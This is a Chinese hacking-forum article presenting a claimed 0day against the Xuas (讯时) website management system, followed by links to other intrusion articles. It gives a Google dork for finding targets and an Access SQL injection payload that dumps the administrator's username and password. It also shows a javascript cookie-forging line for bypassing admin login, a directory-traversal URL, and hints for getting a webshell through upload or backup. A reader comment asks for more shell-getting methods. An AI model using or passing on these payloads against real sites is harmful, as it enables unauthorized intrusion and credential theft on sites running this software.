讯时系统(xuas)最新通杀漏洞0day图文说明
发布时间:2011-07-15 15:13:06 作者:佚名 
我要评论
我要评论讯时系统(xuas)最新通杀漏洞0day图文说明,使用讯时网站管理系统的朋友可以参考下。
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
爆出管理员帐号和密码了
4、cookies进后台
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
5、后台用了cookie验证,直接访问http://www.dxggw.cn/admin/admin_index.asp就OK了!
6、后台有上传和备份取SHELL不难。
7、讯时还有个列目录漏洞:http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.xx.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
相关文章
- 最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现2013-06-11
- 春节呆在家里上网,我表哥突然找我说要一个DJ网站的VIP会员,说搞定后请我吃KFC,于是就答应了。2011-03-22
- 众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及2011-08-20
- 脚本入侵-ASP网站入侵一些技巧 先说明下 先看下是不是html转的asp生成的站2011-04-24
- 这篇文章主要为大家介绍了Linux系统采用netstat命令查看DDOS攻击的方法,对于网络安全而言非常重要!需要的朋友可以参考下2014-07-05
- 手工注入方法,方便大家测试程序漏洞,本人只供学习交流,不建议搞破坏。2011-11-03
phpcms2008 代码执行 批量getshell EXP(使用菜刀)
这篇文章主要介绍了phpcms2008 代码执行 批量getshell EXP的相关资料,需要的朋友可以参考下2014-05-09- 脚本入侵-上传漏洞总结篇(臭小子),从事于网站开发的程序员要看下,不要让自己的程序别黑客利用。2011-04-24
- php后台插一句话的思路加114网址导航后台拿webshell的方法。2011-09-29
- DDos攻击是现在大部分用户最喜欢的一个话题,近两年来发展态势也渐趋平缓,欧洲反垃圾邮件组织Spamhaus突然遭受到高达300Gbps的大流量DDos攻击被认为是史上最大DDoS攻击,2016-09-20
最新评论